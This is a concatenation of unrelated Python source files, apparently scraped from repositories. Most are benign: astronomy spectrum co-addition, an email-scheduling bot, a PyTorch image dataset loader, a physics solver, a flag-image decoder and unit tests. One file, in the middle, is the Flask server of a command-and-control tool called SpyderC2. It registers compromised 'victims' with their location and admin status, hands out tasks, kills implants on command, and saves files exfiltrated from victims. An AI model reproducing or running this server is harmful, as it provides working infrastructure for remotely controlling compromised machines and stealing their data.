rebin = int(rebin)
cat_wave = cat_wave[::rebin]
specs = specs.rebin(cat_wave*u.AA, all=True, do_sig=True, masking='none',grow_bad_sig=True)
# estimate weights for coaddition (PYPYT)
sn2, weights = arco.sn_weight(specs, smask=None)
# coaddition
spec1d = arco.one_d_coadd(specs, weights)
return spec1d
def coadd_stis_from_x1dfiles(filenames, wv_array=None, rebin=None, debug=True):
"""
Parameters
----------
filenames : list
List of filenames with x1d STIS data
Must be of the same object and same
configuration
wv_array : Quantity array
Wavelength array to perform the co-add
rebin : int, optional
If given, it rebins the current sampling by
rebin number of pixels
Returns
-------
spec1d : XSpectrum1D
Co-added version of all the spectra
"""
spec_list = []
for filename in filenames:
aux = load_single_x1d_stis(filename, debug=debug)
for sp in aux:
spec_list += [sp]
# spec_list contains all echelle orders from different files and multi-extensions
specs = collate(spec_list) # now all in a single XSpectrum1D object
if wv_array is None:
# bring them to a unique native wavelength grid using PYPIT
cat_wave = arco.new_wave_grid(specs.data['wave'], wave_method='velocity')
else:
cat_wave = wv_array.to('AA').value
if rebin is not None:
rebin = int(rebin)
cat_wave = cat_wave[::rebin]
specs = specs.rebin(cat_wave*u.AA, all=True, do_sig=True, masking='none',grow_bad_sig=True)
# estimate weights for coaddition (PYPYT)
sn2, weights = arco.sn_weight(specs, smask=None)
# coaddition
spec1d = arco.one_d_coadd(specs,None, weights)
# spec1d = arco.coadd_spectra(specs, wave_grid_method='velocity', scale_method='auto')
return spec1d
def load_single_x1d_stis(filename, debug=False):
"""
Parameters
----------
filename : str
Filename of the fits x1d STIS file
Could me multiextension
Returns
-------
spec_list : list of XSpectrum1D objects, one for each echelle order
of the single STIS x1d file
"""
# get number of extensions
head = fits.getheader(filename, ext=0)
numext = head['NEXTEND']
spec_list = [] # store XSpectrum1D here.
for ext in range(1, numext + 1):
sp = fits.getdata(filename, ext=ext)
print("Loading echelle orders from file {}, ext={}".format(filename, ext))
for ii in range(len(sp.SPORDER)):
# chop pixels at edges of orders (i.e. poor sensitivity)
nchop_blue = 5
nchop_red = 50
fl = sp.FLUX[ii][nchop_blue:-nchop_red]
er = sp.ERROR[ii][nchop_blue:-nchop_red]
wv = sp.WAVELENGTH[ii][nchop_blue:-nchop_red]
spec = XSpectrum1D.from_tuple((wv,fl,er))
spec_list += [spec]
if debug:
pl.plot(sp.WAVELENGTH[ii], sp.FLUX[ii], drawstyle='steps-mid')
pl.plot(sp.WAVELENGTH[ii], sp.ERROR[ii], ":")
return spec_list
def coadd_cos_from_x1dfiles(filenames, wv_array=None, A_pix=0.01*u.AA):
spec_list = []
#TODO: mask out x1d spectral regions with bad values.
for filename in filenames:
sp = readspec(filename)
import pdb; pdb.set_trace()
# mask =
spec_list += [sp]
# spec_list contains all individual spectra
specs = collate(spec_list) # now all in a single XSpectrum1D object
#rebin
if wv_array is None:
# bring them to a unique native wavelength grid using PYPIT
A_pix = A_pix.to("AA").value
cat_wave = arco.new_wave_grid(specs.data['wave'], wave_method='pixel', A_pix=A_pix)
else:
cat_wave = wv_array.to('AA').value
specs = specs.rebin(cat_wave*u.AA, all=True, do_sig=True, masking='none',grow_bad_sig=True)
# estimate weights for coaddition (PYPYT)
sn2, weights = arco.sn_weight(specs)
# coaddition
spec1d = arco.one_d_coadd(specs, weights)
return spec1d
|
nilq/baby-python
|
python
|
import findspark
findspark.init('/opt/spark')
import schedule
import pyspark
from pyspark.sql import SparkSession
from pyspark.sql.functions import col, udf, lit
import random
import smtplib, ssl
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
import schedule
import time
from random import randrange
from datetime import date
from datetime import datetime
def get_spark_session():
return SparkSession.builder.master('local[*]')\
.config("spark.driver.memory", "12G").appName('EmailSender').getOrCreate()
def get_ingest_information():
spark = get_spark_session()
return spark.read.option('header', True).option('inferSchema', True)\
.option('delimiter', '|').csv('ingestor')
def get_avaliable_message(id_message=None):
df = get_ingest_information()
if id_message is None:
messages_avaliable = df.filter(col('processado').isNull()).collect()
return [random.choice(messages_avaliable)]
else:
return df.filter((col('processado').isNull()) & (col('id') == id_message)).collect()
def get_html_string(header, text):
return """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional //EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">
<head>
<!--[if gte mso 9]>
<xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
<o:PixelsPerInch>96</o:PixelsPerInch>
</o:OfficeDocumentSettings>
</xml>
<![endif]-->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="x-apple-disable-message-reformatting">
<!--[if !mso]><!--><meta http-equiv="X-UA-Compatible" content="IE=edge"><!--<![endif]-->
<title></title>
<style type="text/css">
table, td {{ color: #000000; }} @media only screen and (min-width: 670px) {{
.u-row {{
width: 80% !important;
}}
.u-row .u-col {{
vertical-align: top;
}}
.u-row .u-col-100 {{
width: 80% !important;
}}
}}
@media (max-width: 670px) {{
.u-row-container {{
max-width: 100% !important;
padding-left: 0px !important;
padding-right: 0px !important;
}}
.u-row .u-col {{
min-width: 320px !important;
max-width: 100% !important;
display: block !important;
}}
.u-row {{
width: calc(100% - 40px) !important;
}}
.u-col {{
width: 100% !important;
}}
.u-col > div {{
margin: 0 auto;
}}
}}
body {{
margin: 0;
padding: 0;
}}
table,
tr,
td {{
vertical-align: top;
border-collapse: collapse;
}}
p {{
margin: 0;
}}
.ie-container table,
.mso-container table {{
table-layout: fixed;
}}
* {{
line-height: inherit;
}}
a[x-apple-data-detectors='true'] {{
color: inherit !important;
text-decoration: none !important;
}}
</style>
<!--[if !mso]><!--><link href="https://fonts.googleapis.com/css?family=Lato:400,700&display=swap" rel="stylesheet" type="text/css"><link href="https://fonts.googleapis.com/css?family=Playfair+Display:400,700&display=swap" rel="stylesheet" type="text/css"><!--<![endif]-->
</head>
<body class="clean-body" style="margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #f9f9f9;color: #000000">
<!--[if IE]><div class="ie-container"><![endif]-->
<!--[if mso]><div class="mso-container"><![endif]-->
<table style="border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #f9f9f9;width:100%" cellpadding="0" cellspacing="0">
<tbody>
<tr style="vertical-align: top">
<td style="word-break: break-word;border-collapse: collapse !important;vertical-align: top">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td align="center" style="background-color: #f9f9f9;"><![endif]-->
<div class="u-row-container" style="padding: 0px;background-color: transparent">
<div class="u-row" style="Margin: 0 auto;min-width: 320px;max-width: 80%;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ffffff;">
<div style="border-collapse: collapse;display: table;width: 100%;background-color: transparent;">
<!--[if (mso)|(IE)]><table width="100%" cellpadding="0" cellspacing="0" border="0"><tr><td style="padding: 0px;background-color: transparent;" align="center"><table cellpadding="0" cellspacing="0" border="0" style="width:80%;"><tr style="background-color: #ffffff;"><![endif]-->
<!--[if (mso)|(IE)]><td align="center" width="80%" style="width: 80%;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;" valign="top"><![endif]-->
<div class="u-col u-col-100" style="max-width: 320px;min-width: 80%;display: table-cell;vertical-align: top;">
<div style="width: 100% !important;">
<!--[if (!mso)&(!IE)]><!--><div style="padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;"><!--<![endif]-->
<table style="font-family:tahoma,arial,helvetica,sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td style="overflow-wrap:break-word;word-break:break-word;padding:30px 10px 10px;font-family:tahoma,arial,helvetica,sans-serif;" align="left">
<div style="color: #333333; line-height: 140%; text-align: left; word-wrap: break-word;">
<p style="font-size: 14px; line-height: 140%; text-align: center;"><span style="font-size: 28px; line-height: 39.2px; font-family: 'Playfair Display', serif; color: #000000;">{0}</span></p>
</div>
</td>
</tr>
</tbody>
</table>
<table style="font-family:tahoma,arial,helvetica,sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td style="overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:tahoma,arial,helvetica,sans-serif;" align="left">
<table height="0px" align="center" border="0" cellpadding="0" cellspacing="0" width="15%" style="border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 3px solid #ff0009;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%">
<tbody>
<tr style="vertical-align: top">
<td style="word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%">
<span> </span>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<table style="font-family:tahoma,arial,helvetica,sans-serif;" role="presentation" cellpadding="0" cellspacing="0" width="100%" border="0">
<tbody>
<tr>
<td style="overflow-wrap:break-word;word-break:break-word;padding:15px 30px 25px;font-family:tahoma,arial,helvetica,sans-serif;" align="left">
<div style="line-height: 150%; text-align: center; word-wrap: break-word;">
<p style="font-size: 14px; line-height: 150%; text-align: center;"><span style="font-size: 16px; line-height: 24px; color: #555555; font-family: Lato, sans-serif;">{1}</span></p>
</div>
<br>
<div style="line-height: 150%; text-align: center; word-wrap: break-word;">
<p style="font-size: 14px; line-height: 150%; text-align: center;"><span style="font-size: 11px; line-height: 24px; color: #555555; font-family: Lato, sans-serif;">Miracle Bot ©</span></p>
</div>
</td>
</tr>
</tbody>
</table>
<!--[if (!mso)&(!IE)]><!--></div><!--<![endif]-->
</div>
</div>
<!--[if (mso)|(IE)]></td><![endif]-->
<!--[if (mso)|(IE)]></tr></table></td></tr></table><![endif]-->
</div>
</div>
</div>
<!--[if (mso)|(IE)]></td></tr></table><![endif]-->
</td>
</tr>
</tbody>
</table>
<!--[if mso]></div><![endif]-->
<!--[if IE]></div><![endif]-->
</body>
</html>
""".format(header, text)
def send_email(_is_first_message):
context = ssl.create_default_context()
sender_email = "Miracle Bot"
receiver_email = "receiver@gmail.com"
if _is_first_message:
message_info = get_avaliable_message(1)
else:
message_info = get_avaliable_message()
if len(message_info) > 0:
message = MIMEMultipart("alternative")
message["Subject"] = message_info[0].assunto
message["From"] = sender_email
message["To"] = receiver_email
html = get_html_string(message_info[0].titulo, message_info[0].mensagem)
part2 = MIMEText(html, "html")
message.attach(part2)
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as server:
server.login("", "")
server.sendmail(sender_email, receiver_email, message.as_string())
mark_message_as_send(message_info[0].id)
def mark_message_as_send(id_message):
df = get_ingest_information()
df = df.cache()
df_processed = df.filter(col('id') == id_message)
df_processed = df_processed.withColumn('processado', lit(1))
df = df.filter(col('id') != id_message)
df = df.union(df_processed)
df.count()
df.coalesce(1).write.mode('overwrite').option("header", "true").option("delimiter", "|").csv('ingestor')
df.unpersist()
if __name__ == '__main__':
messages_avaliable_count = get_ingest_information().filter(col('processado').isNull()).count()
if messages_avaliable_count > 0:
message_day_and_hour = []
message_days = random.sample(range(date.today().day+2, 30), messages_avaliable_count)
message_hours = [random.choice(range(5, 23)) for i in range(messages_avaliable_count)]
#Test
message_hours.pop()
message_hours.pop()
message_hours.pop()
message_hours.pop()
message_days.pop()
message_days.pop()
message_days.pop()
message_days.pop()
message_days.append(3)
message_hours.append(18)
message_days.append(3)
message_hours.append(19)
message_days.append(3)
message_hours.append(20)
message_days.append(3)
message_hours.append(21)
#Initial message
message_days[0] = 4
message_hours[0] = 0
is_first_message = True
while True:
now = datetime.now()
for index, day in enumerate(message_days):
if now.day == day and now.hour == message_hours[index]:
send_email(is_first_message)
message_days.remove(day)
message_hours.pop(index)
is_first_message = False
time.sleep(30)
if len(message_days) == 0:
break
|
nilq/baby-python
|
python
|
class Test(object):
__slots__ = 'name', 'word_set', 'target', 'longest_subsequence',\
'verbose', 'actual'
def __init__(self, json_object):
self.name = json_object['name']
self.word_set = json_object['word_set']
self.target = json_object['target']
self.longest_subsequence = json_object['longest_subsequence']
self.verbose = json_object['verbose']
self.actual = None
def __str__(self):
return '{0}:\n\
word_set=[{1}]\n\
target={2}\n\
longest_subsequence={3}\n\
actual={4}'.format(
self.name,
','.join([self._get_quoted(w) for w in self.word_set]),
self._get_quoted(self.target),
self._get_quoted(self.longest_subsequence),
self._get_quoted(self.actual))
def _get_quoted(self, s):
return s if s is None else "'{0}'".format(s)
def run(self, subseq_func):
self.actual = subseq_func(self.target, self.word_set)
try:
assert self.longest_subsequence == self.actual,\
'{0} failure: expected={1}, actual={2}'.format(
self.name, self.longest_subsequence, self.actual)
except AssertionError as ae:
print(ae)
|
nilq/baby-python
|
python
|
numbers = [int(el) for el in input().split(", ")]
positive = [str(x) for x in numbers if x >= 0]
negative = [str(x) for x in numbers if x < 0]
even = [str(x) for x in numbers if x % 2 == 0]
odd = [str(x) for x in numbers if not x % 2 == 0]
print("Positive:", ', '.join(positive))
print("Negative:", ', '.join(negative))
print("Even:", ', '.join(even))
print("Odd:", ', '.join(odd))
|
nilq/baby-python
|
python
|
# ------ your setttings ------
TrainModule = 'OutputOshaberi' # your sensation folder name
device = 'cuda' # debugging device
# ------ end of settings -----
if __name__ == '__main__':
from importlib import import_module
from multiprocessing import Value
module = import_module(TrainModule)
func = module.Train(device,True)
shutdown = Value('i',False)
sleep = Value('i',True)
func(shutdown,sleep)
|
nilq/baby-python
|
python
|
year = int(input())
if year%4==0:
cond=True
if year%100==0 and cond==True:
cond=False
if year%400==0 and cond==False:
print(f"{year} is a Leap Year!!")
else:
print(f"{year} is not a Leap Year")
|
nilq/baby-python
|
python
|
from flask import Flask,request
import os
import base64
from lib.logger import Logger
from termcolor import colored
import sys
def main(mongoclient,server_logger,port):
app = Flask('app')
## Get the cookie/victim ID from a request
def get_cookie(request):
d = request.cookies
if d:
return base64.b64decode(d.to_dict()['session']).decode()
else:
return False
def get_victim_info(request):
return request.form.to_dict()
## Checks if we are running on docker container
def docker():
return os.path.isfile('/.dockerenv')
####################################### General beacon and sends task ####################################
@app.route('/',methods = ['GET', 'POST'])
def run():
if request.method == 'GET':
victim_id = get_cookie(request)
## Update last seen
if victim_id:
if victim_id in Victim.victims.keys():
victim_obj = Victim.victims[victim_id]
victim_obj.update_last_seen_status_to_db()
server_logger.info_log(f"Updated last seen of {victim_obj.victim_id}")
task = Task.find_unissued_task(victim_id)
## If there is any task
if task:
if task['command'] == 'kill':
task_obj = Task.load_task(task)
task_dict = task_obj.issue_dict()
## Kill the victim by sending 'Die' and also update db
Victim.victims[victim_id].status = 'Dead'
Victim.victims[victim_id].update_last_seen_status_to_db()
return 'Die'
else:
task_obj = Task.load_task(task)
task_dict = task_obj.issue_dict()
server_logger.info_log(f"Task issued, task id - {colored(task_dict['task_id'],'cyan')}",'green')
server_logger.info_log(f"Task info - {task_dict}",'green')
return task_dict
## Default reply of server incase no commands
return 'Nothing Fishy going on here :)'
## Not needed remove.
if request.method == 'POST':
print("Command to exfiltrate recieved...")
if not os.path.exists('./exfiltration'):
os.mkdir('./exfiltration')
## wb enables to write bianry
with open('./exfiltration/'+request.headers['Filename'], "wb") as f:
# Write bytes to file
f.write(request.data)
f.close()
return "OK"
####################################### Task output handler ####################################
@app.route('/<cmd>/output/<task_id>',methods = ['POST'])
def task_output(cmd,task_id):
if request.method == 'POST':
victim_id = get_cookie(request)
## Handling for various kind of tasks, also passing the task/module options set by user
output = Module.module_task_id[task_id].handle_task_output(request.data,Task.tasks[task_id].options,victim_id,task_id)
## Checking the output path is the default path, then we only give path from shared/victim/data
if f'shared/victim_data/{victim_id}' in os.path.abspath(output):
output_path = output.split('../../')[1]
else:
output_path = os.path.abspath(output)
server_logger.info_log(f"Recieved task output for task ID - {task_id} , Victim ID - {victim_id} , Command - {cmd}, Output - {colored('File dumped to '+output_path,'cyan')} accessible both though host and container.",'green')
task_obj = Task.tasks[task_id]
task_obj.insert_cmd_output(f"File dumped to {output_path}")
return "OK"
####################################### Staging / Initial request from the victim ####################################
@app.route('/stage_0',methods = ['POST'])
def stage():
if request.method == 'POST':
## Get the victim id of the new victim
victim_id = get_cookie(request)
## Get the other info about the victim
info = get_victim_info(request)
if victim_id not in Victim.victims:
## instantiate a new victim object
victim_obj = Victim(victim_id = victim_id,platform = info['platform'],os_version = info['version'],admin = info['admin'],location= info['location'])
if victim_obj:
server_logger.info_log(f"New victim checked in - {victim_id} , {info['platform']}",'green')
return ('Victim registered', 200)
else:
Victim.victims[victim_id].status = 'Alive'
Victim.victims[victim_id].location = info['location'] ## Incase changed
Victim.victims[victim_id].update_location_to_db()
return ('Victim already registered', 302)
return ('Bad request', 400)
####################################### Client Error Recieved ####################################
@app.route('/clienterror',methods = ['POST'])
def clienterror():
if request.method == 'POST':
server_logger.info_log(f"Recieved error from victim - {request.data.decode('utf-8')}",'yellow')
return ('Error Recieved, we will get back to you', 200)
app.run(host = '0.0.0.0', port = port)
def get_db_info():
if 'MONGODB_USERNAME' not in os.environ:
os.environ['MONGODB_USERNAME'] = ''
if 'MONGODB_PASSWORD' not in os.environ:
os.environ['MONGODB_PASSWORD'] = ''
if 'MONGODB_HOSTNAME' not in os.environ:
os.environ['MONGODB_HOSTNAME'] = '127.0.0.1'
if 'MONGODB_DATABASE' not in os.environ:
os.environ['MONGODB_DATABASE'] = 'SpyderC2'
print(colored("You can set these environment variables - MONGODB_USERNAME , MONGODB_PASSWORD , MONGODB_HOSTNAME , MONGODB_DATABASE",'blue'))
db_url = "mongodb://"
if os.environ['MONGODB_USERNAME'] != '' and os.environ['MONGODB_PASSWORD'] != '':
db_url += f"{os.environ['MONGODB_USERNAME']}:{os.environ['MONGODB_PASSWORD']}@"
db_url += f"{os.environ['MONGODB_HOSTNAME']}:27017/{os.environ['MONGODB_DATABASE']}"
return db_url
if __name__=="__main__":
if len(sys.argv) >= 2:
port = sys.argv[1]
else:
port = '8080'
server_logger = Logger(logdir='logs',logfile='logs',verbose=False )
server_logger.setup()
db_url = get_db_info()
from lib.database import Database
from lib.module import Module
from lib.task import Task
from lib.victim import Victim
db_object = Database(url=db_url)
server_logger.info_log(f"Initiated database connection from main- {db_url}",'green')
Victim.mongoclient = db_object.mongoclient
Task.mongoclient = db_object.mongoclient
if db_object.db_data_exists():
db_object.load_db_data()
main(db_object.mongoclient,server_logger,port)
|
nilq/baby-python
|
python
|
'''
PyTorch Dataset Handling. The dataset folder should comprise of two subfolders namely "train" and "test" where both folders has subfolders that named
according to their class names.
'''
import os
import glob
import cv2
import torch
from torch.utils import data
from torch.utils.data import Dataset, dataset
class LoadDataset(Dataset):
'''Loads the dataset from the given path.
'''
def __init__(self, dataset_folder_path, image_size=128, image_depth=3, train=True, transform=None):
'''Parameter Init.
'''
assert not dataset_folder_path is None, "Path to the dataset folder must be provided!"
self.dataset_folder_path = dataset_folder_path
self.transform = transform
self.image_size = image_size
self.image_depth = image_depth
self.train = train
self.classes = sorted(self.get_classnames())
self.image_path_label = self.read_folder()
def get_classnames(self):
'''Returns the name of the classes in the dataset.
'''
return os.listdir(f"{self.dataset_folder_path.rstrip('/')}/train/" )
def read_folder(self):
'''Reads the folder for the images with their corresponding label (foldername).
'''
image_path_label = []
if self.train:
folder_path = f"{self.dataset_folder_path.rstrip('/')}/train/"
else:
folder_path = f"{self.dataset_folder_path.rstrip('/')}/test/"
for x in glob.glob(folder_path + "**", recursive=True):
if not x.endswith('jpg'):
continue
class_idx = self.classes.index(x.split('/')[-2])
image_path_label.append((x, int(class_idx)))
return image_path_label
def __len__(self):
'''Returns the total size of the data.
'''
return len(self.image_path_label)
def __getitem__(self, idx):
'''Returns a single image and its corresponding label.
'''
if torch.is_tensor(idx):
idx = idx.tolist()
image, label = self.image_path_label[idx]
if self.image_depth == 1:
image = cv2.imread(image, 0)
else:
image = cv2.imread(image)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = cv2.resize(image, (self.image_size, self.image_size))
if self.transform:
image = self.transform(image)
return {
'image': image,
'label': label
}
class LoadInputImages(Dataset):
'''Loads the dataset for visualization.
'''
def __init__(self, input_folder, image_size, image_depth, transform=None):
'''Param init.
'''
self.input_folder = input_folder.rstrip('/') + '/'
self.image_size = image_size
self.image_depth = image_depth
self.transform = transform
self.image_paths = self.read_folder()
def read_folder(self):
'''Reads all the image paths in the given folder.
'''
image_paths = []
for x in glob.glob(self.input_folder + '**'):
if not x.endswith('jpg'):
continue
image_paths.append(x)
return image_paths
def __len__(self):
'''Returns the total number of images in the folder.
'''
return len(self.image_paths)
def __getitem__(self, idx):
'''Returns a single image array.
'''
if torch.is_tensor(idx):
idx = idx.tolist()
image = self.image_paths[idx]
if self.image_depth == 1:
image = cv2.imread(image, 0)
else:
image = cv2.imread(image)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = cv2.resize(image, (self.image_size, self.image_size))
if self.transform:
image = self.transform(image)
return image
|
nilq/baby-python
|
python
|
import numpy as np
from perturbative_solver import solve_oscillon
from matplotlib import pyplot as plt
from progress.bar import Bar
############################################################################
# Edit these parameters:
############################################################################
# the values of the frequency to consider:
w_range = np.linspace(0.5, 0.6, 30)
# the Fourier coefficients of the potential. If they do not sum to one,
# another one will be added to satisfy the sum:
coeffs = np.array([1.0])
# the size of the spatial box:
L = 20.0
# the spatial step size:
dr = 0.01
# number of perturbative harmonics:
N_harmonics = 3
# number of backreaction iterations:
N_iterations = 2
############################################################################
# Compute power curve and lifetime:
############################################################################
def calculate_lifecycle(w_range, coeffs, N_harmonics=3):
"""
Auxiliary function to compute lifetime over a range of frequencies.
"""
power_range = np.empty_like(w_range)
energy_range = np.empty_like(w_range)
# iterate through frequencies and collect power and energy information:
with Bar('Processing', max=len(w_range)) as bar:
for i, w in enumerate(w_range):
R, S1, c_harmonics, S_harmonics, power, energy = solve_oscillon(
w,
coeffs=coeffs,
N_iterations=N_iterations,
N_harmonics=N_harmonics,
dr=dr,
L=L)
power_range[i] = power
energy_range[i] = energy
bar.next()
bar.finish()
# lifetime is only integrated over segments of decreasing energy:
lifetime = -(np.diff(energy_range)[np.diff(energy_range) < 0] /
power_range[1:][np.diff(energy_range) < 0]).sum()
print(np.log10(lifetime))
return np.log10(lifetime), power_range, energy_range
if __name__ == '__main__':
# add the coefficient to satisfy the sum-to-one criterion, if needed:
if coeffs.sum() != 1.0:
coeffs = np.hstack((coeffs, [1.0 - coeffs.sum()]))
log10lifetime, power_curve, energy_curve = calculate_lifecycle(
w_range, coeffs)
print('log10(lifetime)=', log10lifetime)
# plot decreasing-energy and increasing-energy segments separately:
for i in range(len(power_curve) - 1):
if energy_curve[i + 1] - energy_curve[i] <= 0:
plt.plot(w_range[[i, i + 1]],
power_curve[[i, i + 1]],
'b-',
lw=2.0)
else:
plt.plot(w_range[[i, i + 1]],
power_curve[[i, i + 1]],
'r--',
lw=1.0,
alpha=0.5)
plt.xlabel('Frequency (m)', fontsize=14)
plt.ylabel(r'Power ($f^2$)', fontsize=14)
plt.yscale('log')
plt.show()
|
nilq/baby-python
|
python
|
from PIL import Image
from csv import reader
inputFilename: str = "./dist/flag.csv"
outputFilename: str = "./writeup/flag.png"
with open(inputFilename, "r") as csv_file:
csv_reader = reader(csv_file)
list_of_rows = list(csv_reader)
size = [len(list_of_rows[0]), len(list_of_rows)]
outputImage: Image = Image.new("RGB", size)
with open(outputFilename, mode="w") as f:
for x in range(size[0]):
for y in range(size[1]):
cell = list_of_rows[y][x].zfill(6)
r: int = int(cell[:2], 16)
g: int = int(cell[2:4], 16)
b: int = int(cell[4:], 16)
outputImage.putpixel((x, y), (r, g, b))
outputImage.save(outputFilename)
print("finish writeout to " + outputFilename)
|
nilq/baby-python
|
python
|
import unittest
import ttrw
from unittest.mock import patch
test_dictionary = {
"en": {
"adverbs": ["test"],
"adjectives": ["test"],
"nouns": ["test"]
},
"pl": {
"adverbs": ["bardzo"],
"adjectives": ["maly"],
"nouns": ["ksiazka"]
}
}
class TestTTRW(unittest.TestCase):
def test_supported_language(self):
for lang in ttrw.languages:
s = ttrw.get_random_words(lang)
self.assertGreater(len(s), 0)
self.assertTrue(type(s) is str)
def test_unsupported_language(self):
self.assertRaises(ValueError, lambda: ttrw.get_random_words("xxx"))
def test_fake_dic(self):
with patch.dict("ttrw.words", test_dictionary):
s = ttrw.get_random_words("en")
self.assertEqual(s, "TestTestTest")
def test_polish_gend(self):
with patch.dict("ttrw.words", test_dictionary):
s = ttrw.get_random_words("pl")
self.assertEqual(s, "BardzoMalaKsiazka")
if __name__ == '__main__':
unittest.main()
|
nilq/baby-python
|
python
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from numpy import array, ndarray
import unittest
from pyquil import Program, get_qc
from pyquil.gates import X, MEASURE
from nisqai.measure._measurement_outcome import MeasurementOutcome
class TestMeasuremnetOutcome(unittest.TestCase):
@staticmethod
def get_all_zeros_outcome(nqubits, nshots):
"""Helper function that returns the outcome of all zeros.
Args:
nqubits : int
Number of qubits in the circuit.
nshots : int
Number of shots to simulate the circuit.
"""
prog = Program()
creg = prog.declare("ro", memory_type="BIT", memory_size=nqubits)
prog += [MEASURE(q, creg[q]) for q in range(nqubits)]
prog.wrap_in_numshots_loop(nshots)
computer = get_qc("{}q-qvm".format(nqubits))
return computer.run(prog)
@staticmethod
def get_all_ones_outcome(nqubits, nshots):
"""Helper function that returns the outcome of all ones.
Args:
nqubits : int
Number of qubits in the circuit.
nshots : int
Number of shots to simulate the circuit.
"""
prog = Program()
creg = prog.declare("ro", memory_type="BIT", memory_size=nqubits)
prog += [X(q) for q in range(nqubits)]
prog += [MEASURE(q, creg[q]) for q in range(nqubits)]
prog.wrap_in_numshots_loop(nshots)
computer = get_qc("{}q-qvm".format(nqubits))
return computer.run(prog)
def test_basic(self):
"""Tests that a MeasurementOutcome can be instantiated."""
# get an outcome from simulating a circuit
result = self.get_all_ones_outcome(4, 10)
# create a MeasurementOutcome
outcome = MeasurementOutcome(result)
# trivial check
self.assertTrue((outcome.raw_outcome == result).all())
def test_num_qubits(self):
"""Tests that a MeasurementOutcome has the right qubit number."""
# number of qubits
nqubits = 4
# get an outcome from simulating a circuit
result = self.get_all_ones_outcome(nqubits, 10)
# create a MeasurementOutcome
outcome = MeasurementOutcome(result)
# trivial check
self.assertEqual(outcome.num_qubits, nqubits)
def test_num_shots(self):
"""Tests that a MeasurementOutcome has the right number of shots."""
# number of qubits
nqubits = 4
# number of shots
nshots = 40
# get an outcome from simulating a circuit
result = self.get_all_ones_outcome(nqubits, nshots)
# create a MeasurementOutcome
outcome = MeasurementOutcome(result)
# trivial check
self.assertEqual(outcome.shots, nshots)
def test_get_item(self):
"""Tests getting an item from a measurement outcome."""
# number of qubits
nqubits = 5
# number of shots
nshots = 40
# get an outcome from simulating a circuit
result = self.get_all_ones_outcome(nqubits, nshots)
# create a MeasurementOutcome
outcome = MeasurementOutcome(result)
self.assertEqual(len(outcome[0]), 5)
def test_len(self):
"""Tests the length of a measurement outcome."""
# get an outcome from simulating a circuit
result = self.get_all_ones_outcome(nqubits=2, nshots=1000)
# create a MeasurementOutcome
outcome = MeasurementOutcome(result)
self.assertEqual(len(outcome), 1000)
def test_as_int(self):
"""Tests the integer value of bit strings is correct."""
# get some measurement outcomes
zeros = MeasurementOutcome(self.get_all_zeros_outcome(nqubits=2, nshots=20))
ones = MeasurementOutcome(self.get_all_ones_outcome(nqubits=2, nshots=20))
# checks for zeros
self.assertTrue(type(zeros.as_int(0)), int)
self.assertEqual(zeros.as_int(0), 0)
# checks for ones
self.assertTrue(type(ones.as_int(0)), int)
self.assertEqual(ones.as_int(0), 3)
def test_as_int_big_int(self):
"""Tests the integer value of bit strings for large integers."""
# get a measurement outcome
ones = MeasurementOutcome(self.get_all_ones_outcome(nqubits=10, nshots=20))
# checks for ones
self.assertTrue(type(ones.as_int(0)), int)
self.assertEqual(ones.as_int(0), 2**10 - 1)
def test_average_all_zeros(self):
"""Tests the average outcome of all zero measurements is all zeros."""
# Get an all zero MeasurementOutcome
zeros = MeasurementOutcome(self.get_all_zeros_outcome(nqubits=4, nshots=20))
# Compute the average
avg = zeros.average()
# Make sure it's all zeros
self.assertTrue(type(avg) == ndarray)
self.assertEqual(len(avg), zeros.num_qubits)
self.assertTrue(sum(avg) == 0)
def test_average_all_ones(self):
"""Tests the average outcome of all ones measurements is all ones."""
# Get an all zero MeasurementOutcome
ones = MeasurementOutcome(self.get_all_ones_outcome(nqubits=4, nshots=20))
# Compute the average
avg = ones.average()
# Make sure it's all zeros
self.assertTrue(type(avg) == ndarray)
self.assertEqual(len(avg), ones.num_qubits)
self.assertTrue(sum(avg) == ones.num_qubits)
def test_average(self):
"""Tests that the average is computed correctly for a given raw outcome."""
# Example result
result = array([[1, 0], [0, 1]])
# Make a MeasurementOutcome
meas = MeasurementOutcome(result)
# Compute the average
avg = meas.average()
# Make sure its correct
self.assertAlmostEqual(avg[0], 0.5)
